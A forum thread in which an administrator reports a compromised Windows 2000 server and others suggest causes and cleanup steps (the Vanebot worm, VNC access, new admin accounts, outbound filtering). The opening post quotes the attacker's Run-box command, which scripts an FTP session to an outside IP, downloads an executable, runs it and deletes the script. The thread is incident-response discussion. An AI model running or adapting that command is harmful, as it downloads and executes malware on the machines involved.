Compromised Windows 2000 Server?

Hi,

I logged into a Win2k Server in a remote office this morning and was greeted by two ftp dos screens with the following in them :

83.70.16.16 Microsoft FTP
get 84785_redworld2.exe etc. etc.

Then there is some reference to 'Lizard Welcomes You' after FTP login..


This was in Start - Run :

cmd /c echo OPEN 83.70.16.16 29212>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

It certainly appears that the server has been accessed from an external source.  We use a Sonicwall Firewall, Server is fully patched.  Can anyone shed some light on this please?



spower22Asked:
Who is Participating?
 
mugman21Connect With a Mentor Commented:
I'm guessing someone in the office downloaded something nasty, or opened an email attachment. This would have to be the case... Firewalls block inbound traffic, but allow it if outbound preceded it.

Is this a webserver, or is this a fileserver or something that is local only to your companies internal network???

If that was in Run, then several things come too mind. First, internal attack - but I doubt it. Second thought, you obviously have some sort of remote management software running, someone obviously got the pass and username. However you got in remotely, they took the same path.

If your running VNC, there is a zeroday in it.. The company can't seem to locate it, I've yet too find it, but someone has. I had a box running the newest version with all patches and fixes, everything configured properly. Some bastard  still got in....

VNC here?????

m.

0
 
PowerITCommented:
You captured a worm. Are people surfing or IM'ing on the server itself?

W32/Vanebot-M is a worm for the Windows platform. W32/Vanebot-M also contains IRC backdoor Trojan functionality which allows a remote intruder to gain access and control over the computer.

W32/Vanebot-M spreads:
to computers vulnerable to common exploits, including SRVSVC (MS06-040)
to MSSQL servers protected by weak passwords
to network shares
via MSN Messenger
via Yahoo Instant Messenger

W32/Vanebot-M may spread with the filename redworld.exe, redworld2.exe or <random numbers>_redworld2.exe.


J.
0
 
PowerITCommented:
As it also spreads through shares and weak SQL-server passwords, it could have entered through a client PC also.
Depending on how well al your rigths are set up it can be from an admin box, but also from a normal client.

J.
0
Worried about phishing attacks?

90% of attacks start with a phish. It’s critical that IT admins and MSSPs have the right security in place to protect their end users from these phishing attacks. Check out our latest feature brief for tips and tricks to keep your employees off a hackers line!

 
PowerITCommented:
Like mugman said: it could also have been installed manually through another exploit. His VNC vulnerability is an example, but there are tons of others.
Hope you can clean this out.

J.
0
 
Machin__ShinCommented:
Don't forget to check the built-in user accounts for new admin accounts like qq$ or such. I had something similar in the end I blocked all non-essential outbound traffic from the server and restricted everything by IP address/range. Range being within the country I am in for web based remote stuff for end users. Was able to remove all the traces in the end and haven't heard bo-peep from it since in terms of problems.
0
 
mugman21Commented:
The reason I specified the remote software or someone on the inside (i.e. pissed off employee) is this: the string left in the RUN's cache. Worms and virii shell themselve's or use some other programatic technique to launch their payload. If someone got in threw remote admin, they would navigate threw the system as if they were sitting in front of it (view of the screen), thus, RUN's command cache is left.

m.
0
 
expexchuserCommented:
Looks like you've made a friend in Dublin, me lad...
http://www.dnsstuff.com/tools/whois.ch?ip=83.70.16.16
0
 
Machin__ShinCommented:
Don't be silly it's probably some poor zombie computer bwaaaaah. On a serious note use your antivirus to clean up the executables and close up your firewall to be limited by IP for remote access. Then check for traces in the Services, Registry start up locations, filter drivers and AD OU's. Of course patch up your rig.
0
 
mugman21Commented:
Machin, anti virus is worthless most of the time. The OP has already stated he is running with full patches and since this is a cooperate machine, I'm pretty damn sure it already has AV installed and the on access check failed. Why would an on access check fail, here's a concept: I can write viruses all day long and no AV product will pick them up until they see the evilness I've created... They have too see the work before they can generate signatures; bloodhound tech sucks.

What makes you think he didn't have a root kit installed?

Come on now.....

m.
0
 
Machin__ShinCommented:
Sounds like you use Symantec.....I did an scan with a fully heuristic enabled symantec with an on-demand scan. It picked up 3 of the things that the hacker used. I used nod32 with full heuristics enabled and it picked up 43. And quite a few antivirus packages claim that they scan for root-kits as well.

But yeah I know what you mean. All depends on what the person used and how far the OP was able to intercede. From the looks of it they used some pretty generic stuff though, like they are only a kiddy scripter if they are downloading stuff that has already be labelled by symantec itself. Doesn't look like custom written tools.
0
 
mugman21Commented:
From my experiance with the little VNC problem; I suppose that is still fresh in my mind.

And no, I don't use Symantec, I'm white listing with my very own beta 2.... :-)

m.
0
 
Machin__ShinCommented:
I wish the author would actually comment on what type of remote client they used. I also have encountered the VNC problem.

Good on you and good luck ^_^, is it written in assembly? Personally I think that you answered the question with the first post. I'm just chucking in my two cents. But if I get a couple of points chucked my way I would be happy.
0
 
mugman21Commented:
I have a little assembler in a sha1 function, mostly C though. Working to port parts to delphi. I have a couple dlls in Vb too. It's working, still need to overhaul it, need more consistancy in language/tools used. I need to get away from the assembler though....
0
 
spower22Author Commented:
Thanks for all your comments, I've secured VNC access on the firewall to only accept calls from my static ip and all seems ok now.  again, thanks for the responses
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.